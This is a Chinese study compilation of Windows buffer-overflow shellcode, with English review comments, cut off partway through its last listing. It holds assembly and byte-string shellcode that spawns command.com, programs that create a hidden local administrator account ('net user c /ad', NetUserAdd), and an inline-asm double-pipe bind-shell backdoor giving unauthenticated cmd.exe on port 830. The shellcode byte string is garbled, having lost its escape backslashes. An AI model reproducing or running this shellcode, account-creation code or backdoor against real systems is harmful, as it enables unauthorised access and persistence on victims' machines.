缓冲区溢出编程学习资料整理
一,开DOS窗口的ShellCode
1)开dos控制台c实现
#include
int main()
{
LoadLibrary("msvcrt.dll");
system("command.com");
return 0;
}
2)开dos控制台部分汇编实现
#include
#include
/*
 * Listing 1-2: spawn command.com by building the string on the stack in
 * inline asm and calling system() through a hard-coded address.
 *
 * NOTE(review): 0x7801AFC3 is msvcrt!system on one specific Windows build
 * (the later listings label it "sp3"); it is wrong on every other build and
 * meaningless under ASLR.  The LoadLibrary call only makes sure msvcrt.dll
 * is mapped at all.  The block also resets esp to ebp and never unwinds its
 * own frame, so once system() returns main's epilogue appears to run on a
 * shifted frame -- tolerable for a test stub, not a clean return.
 */
void main()
{
LoadLibrary("msvcrt.dll");
__asm {
mov esp,ebp ;esp = ebp: drop whatever locals the compiler allocated
push ebp ;save ebp, esp -= 4
mov ebp,esp ;new frame base for the string built below
xor edi,edi ;
push edi ;push 4 zero bytes, esp -= 4; the last one will be the string's NUL terminator
sub esp,08h ;with the push above that is 12 bytes at [ebp-0Ch..ebp-01h] for "command.com"
mov byte ptr [ebp-0ch],63h ;c
mov byte ptr [ebp-0bh],6fh ;o
mov byte ptr [ebp-0ah],6dh ;m
mov byte ptr [ebp-09h],6Dh ;m
mov byte ptr [ebp-08h],61h ;a
mov byte ptr [ebp-07h],6eh ;n
mov byte ptr [ebp-06h],64h ;d
mov byte ptr [ebp-05h],2Eh ;.
mov byte ptr [ebp-04h],63h ;c
mov byte ptr [ebp-03h],6fh ;o
mov byte ptr [ebp-02h],6dh ;m -- [ebp-01h] is still 0, so this is "command.com" NUL-terminated
lea eax,[ebp-0ch] ;
push eax ;address of the string is the single (cdecl) argument
mov eax, 0x7801AFC3 ;hard-coded msvcrt!system, valid for one build only
call eax ;system("command.com"); returns when the console exits
}
}
3)开dos控制台完全汇编实现
#include
/*
 * Listing 1-3: the same console spawn with no C at all -- LoadLibrary and
 * system are both reached through hard-coded addresses.  This is the source
 * of the byte string in listing 1-4.
 *
 * NOTE(review): 0x77e69f64 (kernel32!LoadLibraryA) and 0x7801AFC3
 * (msvcrt!system) belong to one specific build ("sp3" in the comments);
 * they break on any other build and under ASLR.  Neither inline frame is
 * unwound, which is acceptable only because exit(0) never returns.
 */
void main()
{
__asm
{
//Step 1: LoadLibrary("msvcrt.dll") so that system() is mapped.
push ebp
mov ebp,esp
xor eax,eax
push eax
push eax
push eax
//12 zero bytes now sit at [ebp-0Ch..ebp-01h]; the DLL name fills the first 10
mov byte ptr[ebp-0Ch],4Dh
mov byte ptr[ebp-0Bh],53h
mov byte ptr[ebp-0Ah],56h
mov byte ptr[ebp-09h],43h
mov byte ptr[ebp-08h],52h
mov byte ptr[ebp-07h],54h
mov byte ptr[ebp-06h],2Eh
mov byte ptr[ebp-05h],44h
mov byte ptr[ebp-04h],4Ch
mov byte ptr[ebp-03h],4Ch
//that spells MSVCRT.DLL, terminated by the zero bytes left by the pushes
lea eax,[ebp-0Ch]
push eax
mov edx,0x77e69f64 //kernel32!LoadLibraryA, hard-coded for one build ("sp3")
call edx
//Step 2: system("command.com").
push ebp
mov ebp, esp
sub esp, 0x2C
mov eax, 0x6D6D6F63
mov dword ptr [ebp-0x0C], eax //bytes 63 6F 6D 6D = comm
mov eax, 0x2E646E61
mov dword ptr [ebp-0x8], eax //bytes 61 6E 64 2E = and.
mov eax, 0x226D6F63
mov dword ptr [ebp-0x4], eax //bytes 63 6F 6D 22 = com + a 22h placeholder (presumably to keep the encoded bytes NUL-free)
xor edx, edx
mov byte ptr [ebp-0x1], dl //overwrite the placeholder with the terminating NUL
lea eax, dword ptr [ebp-0xC]
push eax
mov eax, 0x7801AFC3 //msvcrt!system, hard-coded for one build ("sp3")
call eax
}
exit(0);
}
4)开dos控制台的机器码实现
/*
 * Listing 1-4: listing 1-3 as raw machine code.
 *
 * NOTE(review): in this copy every "\x" escape has lost its backslash
 * (extraction damage) -- as printed these are ordinary ASCII strings such as
 * "x55x8B...", not bytes, and the array cannot be executed as-is.  Read as
 * hex pairs: 55 8B EC = push ebp / mov ebp,esp; the C6 45 xx yy groups are
 * the byte stores that spell MSVCRT.DLL; BA <addr> / 52 / 8D 45 F4 / 50 /
 * FF 55 F0 = load LoadLibraryA, push it, push the string, call [ebp-10h]
 * (this is where the bytes differ from the asm source, which wrote
 * "call edx"); the second half is the system("command.com") frame ending in
 * FF D0 = call eax.  Both addresses are hard-coded for one build and useless
 * elsewhere or under ASLR; the rest of the blob is position-independent.
 * As a global initialised array it lives in a writable data section, so it
 * can only be jumped to where DEP/NX is not enforced.
 */
unsigned char shellcode[] =
"x55x8BxECx33xC0x50x50x50xC6x45xF4x4DxC6x45xF5x53"
"xC6x45xF6x56xC6x45xF7x43xC6x45xF8x52xC6x45xF9x54xC6x45xFAx2ExC6"
"x45xFBx44xC6x45xFCx4CxC6x45xFDx4CxBA"
"x64x9fxE6x77"//kernel32!LoadLibraryA on the "sp3" build: 0x77e69f64, little-endian
"x52x8Dx45xF4x50"
"xFFx55xF0"
"x55x8BxECx83xECx2CxB8x63x6Fx6Dx6Dx89x45xF4xB8x61x6Ex64x2E"
"x89x45xF8xB8x63x6Fx6Dx22x89x45xFCx33xD2x88x55xFFx8Dx45xF4"
"x50xB8"
"xc3xafx01x78"//msvcrt!system on the "sp3" build: 0x7801afc3, little-endian
"xFFxD0";
二,
1)用函数地址完成开dos控制台功能。
#include
#include
typedef void (*MYPROC)(LPTSTR);//定义函数指针
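/*
 * Listing 2-1: call system("command.com") through an address resolved at
 * run time with GetProcAddress instead of a hard-coded one.
 *
 * Fix vs. the original: neither LoadLibrary nor GetProcAddress was checked,
 * so a missing DLL or export became a call through a NULL pointer.  Both
 * are checked now and the module is released afterwards.  MYPROC
 * (void(*)(LPTSTR)) does not match system()'s real signature
 * (int __cdecl (const char *)); the int result is simply dropped, which is
 * harmless on x86 cdecl, and the typedef is kept because the other
 * listings share it.
 *
 * Returns 0 on success, 1 if msvcrt.dll or its system export could not be
 * resolved.
 */
int main()
{
    HINSTANCE LibHandle;
    MYPROC ProcAdd;

    LibHandle = LoadLibrary("msvcrt.dll");
    if (LibHandle == NULL)
        return 1;

    /* look up the exported address of system() */
    ProcAdd = (MYPROC) GetProcAddress(LibHandle, "system");
    if (ProcAdd == NULL) {
        FreeLibrary(LibHandle);
        return 1;
    }

    /* equivalent to system("command.com"); blocks until the console exits */
    (ProcAdd) ("command.com");
    FreeLibrary(LibHandle);
    return 0;
}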
2)自动查找函数地址。
#include
#include
typedef void (*MYPROC)(LPTSTR);
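/*
 * Listing 2-2: print where msvcrt is mapped and where its system() export
 * lives, so the values can be copied into the asm listings.
 *
 * Fixes vs. the original: the format strings were broken (the "\n" escape
 * had become a literal line break and the address went through "%x", which
 * truncates a pointer on 64-bit builds), and a NULL module handle was
 * passed straight into GetProcAddress.  The printed values are only valid
 * for this exact OS build and, on Vista and later where ASLR re-bases
 * system DLLs, only for this boot.
 *
 * Returns 0 when both lookups succeed, 1 otherwise.
 */
int main()
{
    HINSTANCE LibHandle;
    MYPROC ProcAdd;

    LibHandle = LoadLibrary("msvcrt");
    printf("msvcrt LibHandle = %p\n", (void *)LibHandle);
    if (LibHandle == NULL)
        return 1;

    ProcAdd = (MYPROC)GetProcAddress(LibHandle, "system");
    printf("system = %p\n", (void *)ProcAdd);
    return ProcAdd == NULL ? 1 : 0;
}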
3)获取system和LoadLibraryA函数的地址。
#include
#include
typedef void (*MYPROC)(LPTSTR);
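/*
 * Listing 2-3: print the addresses of msvcrt!system and
 * kernel32!LoadLibraryA -- the two constants the asm listings hard-code.
 *
 * Fixes vs. the original: broken format strings ("\n" had become a literal
 * line break, pointers were printed with "%x"), and a NULL module handle
 * was passed into GetProcAddress.  The values are specific to this build
 * and, under ASLR, to this boot; the second LoadLibrary only bumps the
 * reference count of an already-mapped kernel32.
 *
 * Returns 0 when every lookup succeeds, 1 otherwise.
 */
int main()
{
    HINSTANCE LibHandle;
    MYPROC ProcAdd;
    int rc = 0;

    LibHandle = LoadLibrary("msvcrt");
    printf("msvcrt LibHandle = %p\n", (void *)LibHandle);
    if (LibHandle != NULL) {
        ProcAdd = (MYPROC)GetProcAddress(LibHandle, "system");
        printf("system = %p\n", (void *)ProcAdd);
        if (ProcAdd == NULL)
            rc = 1;
    } else {
        rc = 1;
    }

    LibHandle = LoadLibrary("kernel32");
    printf("kernel32 LibHandle = %p\n", (void *)LibHandle);
    if (LibHandle != NULL) {
        ProcAdd = (MYPROC)GetProcAddress(LibHandle, "LoadLibraryA");
        printf("LoadLibrary = %p\n", (void *)ProcAdd);
        if (ProcAdd == NULL)
            rc = 1;
    } else {
        rc = 1;
    }
    return rc;
}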
三,
1)添加用户的c实现。
#include
#include
/*
 * Listing 3-1: run "net user c /ad" through a hard-coded system() address,
 * then "net localgroup administrators c /add" through the CRT.  Net effect,
 * when it succeeds: a local administrator account "c" with an empty
 * password.  Both net.exe calls need administrative rights.
 *
 * NOTE(review):
 *  - The bytes written below spell "net user c /ad" (14 chars): the string
 *    starts at [ebp-0Fh], one byte above the 16 reserved, so the final 'd'
 *    of "/add" never fits.  net.exe appears to accept the abbreviated
 *    switch, which would be why it still worked -- confirm before relying on
 *    it; starting at [ebp-10h] would hold the full "net user c /add".
 *  - 0x78019B4A is msvcrt!system on one specific build ("win sp2" in the
 *    comment; alternatives are listed after this function).  Wrong on any
 *    other build, meaningless under ASLR.
 *  - esp is reset to ebp and the inline frame is never unwound, so after the
 *    call main's epilogue appears to run on a shifted frame; the C system()
 *    call in between does not depend on ebp, but the final return is not
 *    clean.
 */
void main()
{
LoadLibrary("msvcrt.dll");
__asm {
mov esp,ebp ;esp = ebp: drop whatever locals the compiler allocated
push ebp ;save ebp, esp -= 4
mov ebp,esp ;new frame base for the string built below
xor edi,edi ;
push edi ;4 zero bytes; the last one is the NUL terminator
push edi
push edi
push edi ;16 zero bytes at [ebp-10h..ebp-01h] for the command; only 15 are used, from ebp-0Fh
mov byte ptr [ebp-0Fh],6eh ;n
mov byte ptr [ebp-0eh],65h ;e
mov byte ptr [ebp-0dh],74h ;t
mov byte ptr [ebp-0ch],20h ;(space)
mov byte ptr [ebp-0bh],75h ;u
mov byte ptr [ebp-0ah],73h ;s
mov byte ptr [ebp-09h],65h ;e
mov byte ptr [ebp-08h],72h ;r
mov byte ptr [ebp-07h],20h ;(space)
mov byte ptr [ebp-06h],63h ;c
mov byte ptr [ebp-05h],20h ;(space)
mov byte ptr [ebp-04h],2Fh ;/
mov byte ptr [ebp-03h],61h ;a
mov byte ptr [ebp-02h],64h ;d
mov byte ptr [ebp-01h],0h ;NUL (already zero from the pushes) -- the second d of add is never written
lea eax,[ebp-0fh] ;
push eax ;address of the string is the single (cdecl) argument
mov eax, 0x78019B4A ;hard-coded msvcrt!system ("win sp2"); other builds listed below this function
call eax ;system("net user c /ad")
}
system("net localgroup administrators c /add");
}
//mov eax, 0x78019B4A ;win sp2
//mov eax, 0x7801AFC3 ;win sp3
//mov eax, 0x77bf8044; xp sp0
3)添加用户的另一种c实现。
#ifndef UNICODE
#define UNICODE
#endif
#include
#include
#include
#pragma comment(lib,"netapi32")
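/*
 * Listing 3-3: create a local user and put it in the Administrators group
 * with NetUserAdd / NetLocalGroupAddMembers (no shell, no net.exe).
 * Requires administrative rights.
 *
 * Fixes vs. the original:
 *  - the NET_API_STATUS result was discarded and only "success"/"error"
 *    printed; the status (ERROR_ACCESS_DENIED, NERR_UserExists,
 *    NERR_PasswordTooShort from the password policy, ...) is printed now;
 *  - the "\n" escapes had become literal line breaks;
 *  - the 100-wchar buffer + wcscpy for the account name is an initialised
 *    array.
 * The 4th argument of NetUserAdd receives the index of the offending
 * USER_INFO_1 field, not a Win32 error code, so it is named parm_err.
 * The credentials are hard-coded demo values, and "Administrators" is the
 * English group name only -- localised Windows installs use a translated
 * name, so the well-known SID S-1-5-32-544 is the locale-independent way
 * to address the group.
 *
 * Returns 0 on success, 1 if either call fails.
 */
int wmain()
{
    USER_INFO_1 ui;
    DWORD parm_err = 0;
    NET_API_STATUS status;
    wchar_t szAccountName[] = L"ww0830";
    LOCALGROUP_MEMBERS_INFO_3 account;

    ui.usri1_name = L"ww0830";
    ui.usri1_password = L"ww0830";   /* demo only: hard-coded and trivially weak */
    ui.usri1_priv = USER_PRIV_USER;  /* per the API docs, level-1 adds must use USER_PRIV_USER */
    ui.usri1_home_dir = NULL;
    ui.usri1_comment = NULL;
    ui.usri1_flags = UF_SCRIPT;      /* per the API docs, UF_SCRIPT must be set */
    ui.usri1_script_path = NULL;

    /* create the local account "ww0830" with password "ww0830" */
    status = NetUserAdd(NULL, 1, (LPBYTE)&ui, &parm_err);
    if (status != NERR_Success)
    {
        printf("Add user Error! status=%lu parm_err=%lu\n",
               (unsigned long)status, (unsigned long)parm_err);
        return 1;
    }
    printf("Add user success.\n");

    /* add it to the local Administrators group */
    account.lgrmi3_domainandname = szAccountName;
    status = NetLocalGroupAddMembers(NULL, L"Administrators", 3,
                                     (LPBYTE)&account, 1);
    if (status != NERR_Success)
    {
        printf("Add to Administrators Fail! status=%lu\n", (unsigned long)status);
        return 1;
    }
    printf("Add to Administrators success.\n");
    return 0;
}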
四,
1)Windows对话框的汇编实现。
#include
/*
 * Listing 4-1: MessageBoxA(NULL, "ww0830", "ww", MB_OKCANCEL) with both
 * strings built on the stack and user32!MessageBoxA reached through a
 * hard-coded address.  Arguments are pushed right to left: uType, caption
 * (esi), text (edi), hWnd -- compare the prototype quoted below.
 *
 * NOTE(review): 0x77d3add7 belongs to one specific user32.dll build and is
 * useless elsewhere or under ASLR.  The inline frame (push ebp / sub esp)
 * is never unwound, so after the stdcall returns main's epilogue appears to
 * run on a shifted stack; tolerable for a test stub, not a clean return.
 */
int main()
{
LoadLibrary("user32.dll");
_asm
{
push ebp
mov ebp,esp
sub esp, 80h
//caption "ww" at [ebp-0Bh], address -> esi
mov byte ptr[ebp-0Bh],77h//w
mov byte ptr[ebp-0Ah],77h//w
mov byte ptr[ebp-09h],0h//0x00 terminator
lea esi,[ebp-0Bh]
//text "ww0830" at [ebp-07h], address -> edi
mov byte ptr[ebp-07h],77h//w
mov byte ptr[ebp-06h],77h//w
mov byte ptr[ebp-05h],30h//0
mov byte ptr[ebp-04h],38h//8
mov byte ptr[ebp-03h],33h//3
mov byte ptr[ebp-02h],30h//0
mov byte ptr[ebp-01h],0h//0x00 terminator
lea edi,[ebp-07h]
push 1//uType = 1 = MB_OKCANCEL
push esi//lpCaption
push edi//lpText
push 0//hWnd = NULL
mov eax,77d3add7h//user32!MessageBoxA, hard-coded for one build
call eax
}
return 0;
}
/*
int MessageBox(
HWND hWnd, // handle of owner window
LPCTSTR lpText, // address of text in message box
LPCTSTR lpCaption, // address of title of message box
UINT uType // style of message box
);
*/
五,
1)socket编程的服务端程序。
#include
#include
#pragma comment(lib,"Ws2_32")
#define MYPORT 830 /*定义用户连接端口*/
#define BACKLOG 10 /*多少等待连接控制*/
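/*
 * Listing 5-1: minimal Winsock TCP server.  Listens on MYPORT (830) on all
 * interfaces, accepts one client, sends it one line and exits.
 *
 * Fixes vs. the original:
 *  - send() was asked for 14 bytes from an 8-byte literal ("ww0830\n" plus
 *    NUL), so six bytes of whatever followed it in .rdata were leaked to the
 *    client; the length is now derived from the buffer.
 *  - socket/bind/listen/accept results were compared with -1 through int
 *    variables; they now use SOCKET / INVALID_SOCKET / SOCKET_ERROR as the
 *    Winsock API defines them.
 *  - the "\n" escapes in the messages had become literal line breaks.
 *  - WSAStartup was unchecked and WSACleanup never called; the sockaddr_in
 *    was not zeroed (sin_zero left uninitialised); "listen..." is flushed
 *    before the blocking accept.
 * No authentication and no timeouts: this is a protocol demo, not a
 * service.  Error paths close what was opened and exit(1).
 */
int main()
{
    SOCKET sockfd, new_fd;           /* listening socket, accepted connection */
    struct sockaddr_in my_addr;      /* local address */
    struct sockaddr_in their_addr;   /* peer address, filled in by accept() */
    int sin_size;
    WSADATA ws;
    static const char msg[] = "ww0830\n";

    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0)
    {
        printf("WSAStartup error\n");
        exit(1);
    }
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd == INVALID_SOCKET)
    {
        printf("socket error\n");
        WSACleanup();
        exit(1);
    }

    ZeroMemory(&my_addr, sizeof(my_addr));
    my_addr.sin_family = AF_INET;
    my_addr.sin_port = htons(MYPORT);
    my_addr.sin_addr.s_addr = INADDR_ANY;   /* every local interface */
    if (bind(sockfd, (struct sockaddr *)&my_addr, sizeof(my_addr)) == SOCKET_ERROR)
    {
        printf("bind error\n");
        closesocket(sockfd);
        WSACleanup();
        exit(1);
    }
    if (listen(sockfd, BACKLOG) == SOCKET_ERROR)
    {
        printf("listen error\n");
        closesocket(sockfd);
        WSACleanup();
        exit(1);
    }
    printf("listen...");
    fflush(stdout);

    sin_size = sizeof(their_addr);
    new_fd = accept(sockfd, (struct sockaddr *)&their_addr, &sin_size);
    if (new_fd == INVALID_SOCKET)
    {
        printf("accept error\n");
        closesocket(sockfd);
        WSACleanup();
        exit(1);
    }
    printf("\naccept!\n");

    /* one line to the client; the length excludes the terminating NUL */
    if (send(new_fd, msg, (int)(sizeof(msg) - 1), 0) == SOCKET_ERROR)
    {
        printf("send error");
        closesocket(new_fd);
        closesocket(sockfd);
        WSACleanup();
        exit(1);
    }
    printf("send ok!\n");

    closesocket(new_fd);
    closesocket(sockfd);
    WSACleanup();
    return 0;
}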
2)socket编程的客户端程序
#include
#include
#include
#pragma comment(lib,"Ws2_32")
#define PORT 830/* 客户机连接远程主机的端口 */
#define MAXDATASIZE 100/* 每次可以接收的最大字节 */
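/*
 * Listing 5-2: minimal Winsock TCP client.  Connects to argv[1]:PORT,
 * receives one buffer and prints it.  argv[1] must be a dotted-quad
 * address: inet_addr() does no name resolution despite the usage text.
 *
 * Fixes vs. the original:
 *  - recv() could fill all MAXDATASIZE bytes and the terminator was then
 *    written to buf[MAXDATASIZE], one past the end; the read is capped at
 *    MAXDATASIZE-1.  (The terminator line had also been garbled to "/\0/" in
 *    this copy.)
 *  - a 0 return from recv (peer closed) was printed as data; it is reported.
 *  - inet_addr() failure (INADDR_NONE) is rejected instead of silently
 *    connecting to 255.255.255.255.
 *  - "\n" escapes restored, "connet" typo fixed, SOCKET / INVALID_SOCKET /
 *    SOCKET_ERROR instead of int / -1, WSAStartup checked, WSACleanup called.
 * The received bytes are printed with %s, so the server controls what lands
 * on the console (embedded NUL truncates, escape sequences are passed on).
 */
int main(int argc, char *argv[])
{
    SOCKET sockfd;
    int numbytes;
    char buf[MAXDATASIZE];
    struct sockaddr_in their_addr;   /* server address */
    WSADATA ws;

    if (argc != 2)
    {
        fprintf(stderr, "usage: client hostname\n");
        exit(1);
    }
    if (WSAStartup(MAKEWORD(2, 2), &ws) != 0)
    {
        printf("WSAStartup error\n");
        exit(1);
    }
    sockfd = socket(AF_INET, SOCK_STREAM, 0);
    if (sockfd == INVALID_SOCKET)
    {
        printf("socket error\n");
        WSACleanup();
        exit(1);
    }

    ZeroMemory(&their_addr, sizeof(their_addr));
    their_addr.sin_family = AF_INET;
    their_addr.sin_port = htons(PORT);
    their_addr.sin_addr.s_addr = inet_addr(argv[1]);   /* dotted quad only */
    if (their_addr.sin_addr.s_addr == INADDR_NONE)
    {
        printf("bad address: %s\n", argv[1]);
        closesocket(sockfd);
        WSACleanup();
        exit(1);
    }
    if (connect(sockfd, (struct sockaddr *)&their_addr, sizeof(their_addr)) == SOCKET_ERROR)
    {
        printf("connect error\n");
        closesocket(sockfd);
        WSACleanup();
        exit(1);
    }

    /* leave one byte for the terminator */
    numbytes = recv(sockfd, buf, MAXDATASIZE - 1, 0);
    if (numbytes == SOCKET_ERROR)
    {
        printf("recv error\n");
        closesocket(sockfd);
        WSACleanup();
        exit(1);
    }
    buf[numbytes] = '\0';
    if (numbytes == 0)
        printf("connection closed by peer\n");
    else
        printf("Received: %s", buf);

    closesocket(sockfd);
    WSACleanup();
    return 0;
}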
六,用CreateProcess开dos控制窗口
#include
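/*
 * Listing 6: open a console with CreateProcess instead of system().
 *
 * Fixes vs. the original:
 *  - si.cb was left 0 after ZeroMemory; CreateProcess documents it as
 *    required and it is set to sizeof(STARTUPINFO) now.
 *  - the command line was a string literal; CreateProcess takes a non-const
 *    lpCommandLine (the Unicode variant modifies it), so a writable array
 *    is used.
 *  - the call was unchecked and the returned process/thread handles leaked;
 *    they are checked and closed (closing them does not end cmd.exe).
 * bInheritHandles stays 1 as in the original: cmd.exe inherits every
 * inheritable handle of this process, which is what the pipe and socket
 * listings later build on.  Returns 0 on success, 1 on failure.
 */
int main()
{
    PROCESS_INFORMATION ProcessInformation;
    STARTUPINFO si;
    char cmdLine[] = "cmd.exe /k";   /* /k keeps the console open */

    ZeroMemory(&si, sizeof(si));
    si.cb = sizeof(si);
    ZeroMemory(&ProcessInformation, sizeof(ProcessInformation));

    if (!CreateProcess(NULL, cmdLine, NULL, NULL, 1, 0, NULL, NULL,
                       &si, &ProcessInformation))
        return 1;

    CloseHandle(ProcessInformation.hThread);
    CloseHandle(ProcessInformation.hProcess);
    return 0;
}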
七,
1)双管道后门汇编实现。
/*
bind 830 asm for test
by ww0830
*/
#include
#pragma comment(lib,"Ws2_32")
/*
 * Listing 7-1: double-pipe bind shell in inline asm.  The C reference is
 * listing 7-4 and the byte string is 7-2.  Listens on 0.0.0.0:830, accepts
 * one client, starts a hidden cmd.exe whose stdin is pipe 2 and whose
 * stdout/stderr are pipe 1, then relays between the socket and the pipes.
 * The table below gives the [ebp+N] slot of every imported function
 * pointer and every variable.
 *
 * NOTE(review):
 *  - All thirteen API addresses are hard-coded for one build ("xp sp0");
 *    they are wrong on any other build and meaningless under ASLR.  The
 *    host must already have ws2_32.dll mapped (hence the LoadLibrary).
 *  - No authentication, no encryption: whoever reaches port 830 gets a
 *    shell with this process's token.
 *  - The relay loop never exits: "end:" is unreachable and ExitProcess,
 *    although stored at [ebp+24], is never called.  recv()'s result is
 *    stored and used as a length without being checked, so a closed
 *    connection (0) or SOCKET_ERROR (0xFFFFFFFF) is passed to WriteFile.
 *  - Each pass through loop1 executes "sub esp,400h" without a matching
 *    add, so the stack pointer walks down 1 KiB per iteration; a long
 *    session eventually runs off the thread's stack.
 *  - PeekNamedPipe is polled once per pass before the blocking recv(), so
 *    output cmd.exe produces after the poll is not forwarded until the
 *    client sends something else.
 */
int main()
{
LoadLibrary("WS2_32.DLL");
/*
Slot table: [ebp+N] for each function pointer and variable.
"CreatePipe" 4
"CreateProcessA"8
"PeekNamedPipe"12
"WriteFile"16
"ReadFile"20
"ExitProcess"24
"WSAStartup"28
"socket"32
"bind"36
"listen"40
"accept"44
"send"48
"recv"52
&hReadPipe1, 56
&hWritePipe1 60
&hReadPipe2, 64
&hWritePipe2 68
lBytesRead 72
*/
__asm
{
push ebp; saved but never restored -- there is no exit path below
sub esp, 80; 80-byte table: [ebp+4..ebp+52] = 13 function pointers, [ebp+56..ebp+72] = pipe handles and lBytesRead
mov ebp,esp; ebp = base of the table; esp moves freely below it
//store the API addresses -- all hard-coded for one build ("xp sp0"); wrong on any other build and under ASLR
mov eax,0x77e5727a
mov [ebp+4], eax;CreatePipe
mov eax,0x77e41bb8
mov [ebp+8], eax;CreateProcessA
mov eax,0x77e97624
mov [ebp+12], eax;PeekNamedPipe
mov eax,0x77e59d8c
mov [ebp+16], eax;WriteFile
mov eax,0x77e58b82
mov [ebp+20], eax;ReadFile
mov eax,0x77e55cb5
mov [ebp+24], eax;ExitProcess -- stored but never called
mov eax,0x71a241da
mov [ebp+28], eax;WSAStartup
mov eax,0x71a23c22
mov [ebp+32], eax;socket
mov eax,0x71a23ece
mov [ebp+36], eax;bind
mov eax,0x71a25de2
mov [ebp+40], eax;listen
mov eax,0x71a2868d
mov [ebp+44], eax;accept
mov eax,0x71a21af4
mov [ebp+48], eax;send
mov eax,0x71a25690
mov [ebp+52], eax;recv
mov eax,0x0; eax is not used by the stores below
mov [ebp+56],0; hReadPipe1 -- assembled as a byte store (C6 45 38 00 in listing 7-2), so only the low byte is cleared; harmless, CreatePipe overwrites the slot before it is read
mov [ebp+60],0; hWritePipe1 (byte store, same remark)
mov [ebp+64],0; hReadPipe2 (byte store)
mov [ebp+68],0; hWritePipe2 (byte store)
mov [ebp+72],0; lBytesRead (byte store; PeekNamedPipe writes all 4 bytes before it is read)
LWSAStartup:
; WSAStartup(0x202, DATA) -- 400 bytes of scratch for WSADATA, never released
sub esp, 400
push esp
push 0x202
call [ebp + 28]
socket:
;socket(2,1,6) = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP)
push 6
push 1
push 2
call [ebp + 32]
mov ebx, eax ; save socket to ebx (listenFD)
LBind:
;bind(listenFD,(sockaddr *)&server,sizeof(server));
xor edi,edi
push edi ; sin_zero, first 4 bytes
push edi ; sin_addr = 0 = INADDR_ANY
mov eax,0x3E030002
push eax; sin_family = 2 (AF_INET), sin_port = 033Eh in network order = 830
mov esi, esp ; esi = &server: 12 bytes pushed; the 16-byte length below also covers 4 bytes above them (rest of sin_zero), which bind ignores
push 0x10 ; length
push esi ; &server
push ebx ; socket
call [ebp + 36] ; bind
LListen:
;listen(listenFD,2)
inc edi
inc edi
push edi;2 = backlog
push ebx;socket
call [ebp + 40];listen
LAccept:
;accept(listenFD,(sockaddr *)&server,&iAddrSize)
push 0x10 ; iAddrSize = 16, kept on the stack
lea edi,[esp]
push edi ; &iAddrSize
push esi;&server, reused as the peer-address buffer
push ebx;socket
call [ebp + 44];accept -- blocks until a client connects; the result is not checked
mov ebx, eax;save newsocket to ebx (clientFD); listenFD is not referenced again
Createpipe1:
;CreatePipe(&hReadPipe1,&hWritePipe1,&pipeattr1,0);
xor edi,edi
inc edi
push edi ; SECURITY_ATTRIBUTES.bInheritHandle = 1
xor edi,edi
push edi ; lpSecurityDescriptor = NULL
push 0xc;pipeattr nLength = 12 = sizeof(SECURITY_ATTRIBUTES) on 32-bit
mov esi, esp ; esi = &pipeattr, shared by both CreatePipe calls
push edi;0 = nSize (default pipe buffer)
push esi;pipeattr1
lea eax, [ebp+60];&hWritePipe1
push eax
lea eax, [ebp+56];&hReadPipe1
push eax
call [ebp+4]
CreatePipe2:
;CreatePipe(&hReadPipe2,&hWritePipe2,&pipeattr2,0);
push edi;0
push esi;pipeattr2 -- the same struct as pipeattr1
lea eax,[ebp+68];hWritePipe2
push eax
lea eax, [ebp+64];hReadPipe2
push eax
call [ebp+4]
CreateProcess:
;ZeroMemory: STARTUPINFO is 44h bytes and PROCESS_INFORMATION 10h; both live in the 80h bytes reserved here
sub esp, 0x80
lea edi, [esp]
xor eax, eax
push 0x80
pop ecx
rep stosd//clear si -- ecx counts dwords, so this zeroes 512 bytes, not the 80h reserved; by my count the extra 384 bytes land on the already-consumed pipeattr, iAddrSize, sockaddr and WSADATA scratch above and stop short of the [ebp+4..] table, so it happens to be harmless
;si.dwFlags = 0x101 = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; wShowWindow stays 0 = SW_HIDE; si.cb stays 0 although CreateProcess documents it as required
lea edi,[esp] ; edi = &si again (rep stosd advanced it)
mov eax, 0x0101
mov [edi+2ch], eax;
;si.hStdInput = hReadPipe2 ebp+64
mov eax,[ebp+64]
mov [edi+38h],eax
;si.hStdOutput si.hStdError = hWritePipe1 ebp+60
mov eax,[ebp+60]
mov [edi+3ch],eax
mov eax,[ebp+60]
mov [edi+40h],eax
;cmd.exe -- the bytes 63 6D 64 00 ("cmd" + NUL) stored just past PROCESS_INFORMATION, at si+64h
mov eax, 0x00646d63
mov [edi+64h],eax;cmd
;CreateProcess(NULL,cmdLine,NULL,NULL,1,0,NULL,NULL,&si,&ProcessInformation)
;ecx is 0 here (left by rep stosd); the inc/dec pair produces the single 1
lea eax, [esp+44h]
push eax;&pi
push edi;&si
push ecx;0 lpCurrentDirectory
push ecx;0 lpEnvironment
push ecx;0 dwCreationFlags
inc ecx
push ecx;1 bInheritHandles -- cmd.exe receives every inheritable handle of this process
dec ecx
push ecx;0 lpThreadAttributes
push ecx;0 lpProcessAttributes
lea eax,[edi+64h];"cmd"
push eax
push ecx;0 lpApplicationName
call [ebp+8]
loop1:
;while1 -- relay loop; never exits
;PeekNamedPipe(hReadPipe1,Buff,1024,&lBytesRead,0,0);
sub esp,400h; 1 KiB for Buff, allocated again on EVERY pass and never released: the stack shrinks 1 KiB per iteration
mov esi,esp;esi = Buff
xor ecx, ecx
push ecx;0 lpBytesLeftThisMessage
push ecx;0 lpTotalBytesAvail
lea edi,[ebp+72];&lBytesRead
push edi
mov eax,400h
push eax;1024
push esi;Buff
mov eax,[ebp+56]
push eax;hReadPipe1
call [ebp+12]
mov eax,[edi]
test eax,eax
jz recv_command ; nothing from cmd.exe yet -> block in recv; output produced after this poll waits for the next client input
send_result:
;ReadFile(hReadPipe1,Buff,lBytesRead,&lBytesRead,0)
xor ecx,ecx
push ecx;0 lpOverlapped
push edi;&lBytesRead
push [edi];nNumberOfBytesToRead = lBytesRead (the original comment said hReadPipe1, which is wrong)
push esi;Buff
push [ebp+56];hReadPipe1
call [ebp+20]
;send(clientFD,Buff,lBytesRead,0) -- result not checked
xor ecx,ecx
push ecx;0
push [edi];lBytesRead
push esi;Buff
push ebx;clientFD
call [ebp+48]
jmp loop1
recv_command:
;recv(clientFD,Buff,1024,0)
xor ecx,ecx
push ecx
mov eax,400h
push eax
push esi
push ebx
call [ebp+52]
//lea ecx,[edi]
mov [edi],eax ; lBytesRead = recv result, unchecked: 0 (peer closed) or 0xFFFFFFFF (SOCKET_ERROR) goes straight into WriteFile below
;WriteFile(hWritePipe2,Buff,lBytesRead,&lBytesRead,0)
xor ecx,ecx
push ecx
push edi
push [edi]
push esi
